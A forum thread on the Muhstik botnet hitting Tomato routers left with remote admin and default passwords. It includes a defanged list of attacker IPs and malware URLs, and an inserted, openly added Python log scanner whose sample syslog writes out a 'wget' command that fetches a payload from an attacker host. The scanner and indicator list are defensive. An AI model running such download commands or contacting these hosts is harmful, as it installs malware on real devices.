Routers running Tomato firmware under attack

Monkey34 ([H]ardness Supreme, joined Apr 11, 2003, 5,107 messages)

Nobu (2[H]4U, joined Jun 7, 2007, 3,670 messages)
I would think that remote access would be disabled by default...or are they saying people are enabling remote and keeping the default password? o_O

Why do they even have a default for remote? It should force you to pick one when you enable it, or at least lock you out of remote access with a message saying to change the password in the config....
 

SFB ([H]Lite, joined Feb 21, 2011, 67 messages)
https://www.linksysinfo.org/index.php?threads/muhstik-botnet-targeting-iot-devices-including-4-600-tomato-based-routers.75136/

joew333 said:
The risk is present if you 1) have remote access turned on in Administration (which is not a default setting) and 2) you also have the default root/admin user/password. No systematic security issue was found in Tomato, just bad password management by some users.

If you see any of these IP addresses or domains in your system log, you may have the infection.

46.149.233[.]35
68.66.253[.]100
185.61.149[.]22
hxxp://y.fd6fq54s6df541q23sdxfg[.]eu/nvr
hxxp://159.89.156[.]190/.y/pty1
hxxp://159.89.156[.]190/.y/pty3
hxxp://159.89.156[.]190/.y/pty5
hxxp://159.89.156[.]190/.y/pty6
s.shadow.mods[.]net
 
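The two conditions joew333 describes (remote administration enabled plus the default root/admin password) and the indicator list in the post above both lend themselves to a quick local check. The Python below is an added example; it is not code from the thread, from the Muhstik write-up, or from the Tomato/FreshTomato project. It assumes NVRAM-style key names `remote_management` and `http_passwd` (an assumption about the firmware's variable names, not something verified against it), refangs the indicators exactly as posted, and scans a constructed syslog excerpt. Because dnsmasq, the iptables logger and busybox wget usually record only a host or IP rather than a full URL, each URL indicator also contributes its host, and IP matching is anchored so that a near-miss such as 146.149.233.35 is not reported as 46.149.233.35.

```python
import re
from urllib.parse import urlsplit

# Indicators exactly as posted in the thread (defanged with [.] and hxxp).
IOCS_DEFANGED = [
    "46.149.233[.]35",
    "68.66.253[.]100",
    "185.61.149[.]22",
    "hxxp://y.fd6fq54s6df541q23sdxfg[.]eu/nvr",
    "hxxp://159.89.156[.]190/.y/pty1",
    "hxxp://159.89.156[.]190/.y/pty3",
    "hxxp://159.89.156[.]190/.y/pty5",
    "hxxp://159.89.156[.]190/.y/pty6",
    "s.shadow.mods[.]net",
]

IPV4_RE = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}$")


def refang(ioc):
    """Undo the usual defanging so the value can be matched against real log text."""
    return ioc.replace("[.]", ".").replace("hxxp://", "http://").replace("hxxps://", "https://")


def expand_indicators(iocs):
    """Map each refanged indicator to its kind: 'ip', 'domain' or 'url'.

    A URL also contributes its host, because dnsmasq, the iptables logger and
    busybox wget typically record only the host or IP, not the full URL.
    """
    kinds = {}
    for raw in iocs:
        value = refang(raw)
        if value.startswith(("http://", "https://")):
            kinds[value] = "url"
            host = urlsplit(value).hostname
            kinds[host] = "ip" if IPV4_RE.match(host) else "domain"
        elif IPV4_RE.match(value):
            kinds[value] = "ip"
        else:
            kinds[value] = "domain"
    return kinds


def compile_patterns(kinds):
    """Anchor each indicator so 46.149.233.35 does not match inside 146.149.233.35
    or 46.149.233.350, and a domain does not match a longer name that contains it."""
    patterns = {}
    for value, kind in kinds.items():
        esc = re.escape(value)
        if kind == "ip":
            patterns[value] = re.compile(r"(?<![\d.])" + esc + r"(?![\d.])")
        elif kind == "domain":
            patterns[value] = re.compile(r"(?<![\w.-])" + esc + r"(?![\w-])", re.IGNORECASE)
        else:  # url: the scheme anchors the start; stop at the end of the path token
            patterns[value] = re.compile(esc + r"(?![\w-])", re.IGNORECASE)
    return patterns


def scan_log(text, iocs=IOCS_DEFANGED):
    """Return (line_number, indicator) pairs for every indicator seen on each line."""
    patterns = compile_patterns(expand_indicators(iocs))
    hits = []
    for lineno, line in enumerate(text.splitlines(), 1):
        for value, pattern in patterns.items():
            if pattern.search(line):
                hits.append((lineno, value))
    return hits


def remote_admin_exposed(nvram):
    """The condition joew333 describes: WAN-side admin reachable AND the default password.

    `nvram` mimics the key/value output of `nvram show`; the key names
    remote_management and http_passwd are assumptions, not verified against the firmware.
    """
    remote_on = nvram.get("remote_management", "0") == "1"
    default_password = nvram.get("http_passwd", "admin") == "admin"
    return remote_on and default_password


# Constructed syslog excerpt (not a real capture): hits, a near-miss IP and benign traffic.
SAMPLE_LOG = """\
Jan 20 10:01:12 tomato daemon.info dnsmasq[412]: query[A] s.shadow.mods.net from 192.168.1.50
Jan 20 10:01:15 tomato user.notice wget: connecting to 159.89.156.190:80 GET /.y/pty3
Jan 20 10:02:00 tomato kern.warn kernel: DROP IN=vlan2 SRC=185.61.149.22 DST=203.0.113.7
Jan 20 10:03:44 tomato daemon.info dnsmasq[412]: query[A] time.nist.gov from 192.168.1.20
Jan 20 10:04:10 tomato kern.warn kernel: ACCEPT IN=vlan2 SRC=146.149.233.35 DST=203.0.113.7
Jan 20 10:05:02 tomato user.notice sh: wget http://159.89.156.190/.y/pty1 -O /tmp/pty1
"""

if __name__ == "__main__":
    for lineno, value in scan_log(SAMPLE_LOG):
        print("line %d: %s" % (lineno, value))
    print("remote admin exposed:", remote_admin_exposed({"remote_management": "1", "http_passwd": "admin"}))
```

On a real box the equivalent is feeding `/var/log/messages` (or whatever the syslog target is) into `scan_log` and the output of `nvram show` into `remote_admin_exposed`; a hit on line 2 comes from the host alone, since that log line never contains the full URL, and line 5 is deliberately not reported.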

Darunion (2[H]4U, joined Oct 6, 2010, 3,955 messages)
I honestly didn't think this was still a thing. I remember trying Tomato on my WRT54G back in the day. So the last official update of it was 9 years ago? Looks like the project was taken over by another team and their last update was 2 years ago? Not trying to be a dick, just what I'm googling shows it is pretty old at this point.
 

Lakados ([H]ard|Gawd, joined Feb 3, 2014, 1,948 messages)
I would think people that go through the work to install a 3rd party firmware on their router would be smart enough to change the default password.

You would think so.... but back during my time in the trenches I went to many locations that were using Tomato or DD-WRT and they still had the defaults. Businesses were the worst for this.
 

ThatITGuy (Limp Gawd, joined May 5, 2017, 344 messages)
Lakados said:
You would think so.... but back during my time in the trenches I went to many locations that were using Tomato or DD-WRT and they still had the defaults. Businesses were the worst for this.

If you change from the defaults, then someone has to remember or keep that documented. This can cause problems when you treat IT (people) like a commodity.
 

SFB ([H]Lite, joined Feb 21, 2011, 67 messages)
Darunion said:
I honestly didn't think this was still a thing. I remember trying Tomato on my WRT54G back in the day. So the last official update of it was 9 years ago? Looks like the project was taken over by another team and their last update was 2 years ago? Not trying to be a dick, just what I'm googling shows it is pretty old at this point.

Tomato is alive and well. The current branches are known as "FreshTomato".
 

tangoseal ([H]ardForum Junkie, joined Dec 18, 2010, 8,266 messages)
I can't imagine anyone is actually still using those old WRT54G routers with Tomato on them, are they?
 

nilepez ([H]ardForum Junkie, joined Jan 21, 2005, 11,607 messages)
tangoseal said:
I can't imagine anyone is actually still using those old WRT54G routers with Tomato on them, are they?

I quit using mine years ago, but that was mostly because the R7000 was on sale for 100 bucks at Wally World. But honestly, until I started ripping my 4K disks to my NAS, I rarely needed the extra bandwidth (and I suspect most people don't have a drive that can rip 4K disks (or if they do, they either don't have 4K disks or they aren't aware that they can)).

But this thread does have me thinking about trying Tomato again on the R7000 :D
 

pillagenburn ([H]ard|Gawd, joined Oct 3, 2006, 1,070 messages)
hah! they would never guess my admin creds with my username/password of "fuck" and "yourself"
 

nilepez ([H]ardForum Junkie, joined Jan 21, 2005, 11,607 messages)
pillagenburn said:
hah! they would never guess my admin creds with my username/password of "fuck" and "yourself"

Barely matters if you don't allow remote access. I'm not sure if I've ever allowed remote access, but if I did, it's rare and temporary.
 